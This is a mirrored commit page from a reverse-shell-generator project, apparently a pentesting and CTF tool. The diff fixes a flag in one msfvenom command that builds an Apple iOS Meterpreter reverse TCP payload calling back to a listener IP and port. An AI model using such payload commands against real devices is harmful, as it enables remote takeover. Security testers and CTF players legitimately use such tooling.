mirror of
https://github.com/0dayCTF/reverse-shell-generator.git
synced 2024-12-18 19:06:09 +00:00
Changed -p to --platform
Redundant -p, meant to use --platform first.
This commit is contained in:
parent
e4aa07eae8
commit
09e9c4ae50
@ -455,7 +455,7 @@ const msfvenomCommands = withCommandType(
|
||||
},
|
||||
{
|
||||
"name": "Apple iOS Meterpreter Reverse TCP Inline",
|
||||
"command": "msfvenom -p apple_ios -p apple_ios/aarch64/meterpreter_reverse_tcp lhost={ip} lport={port} -f macho -o payload",
|
||||
"command": "msfvenom --platform apple_ios -p apple_ios/aarch64/meterpreter_reverse_tcp lhost={ip} lport={port} -f macho -o payload",
|
||||
"meta": ["msfvenom", "apple_ios", "apple_ios", "reverse"]
|
||||
},
|
||||
{
|
||||
|
Loading…
Reference in New Issue
Block a user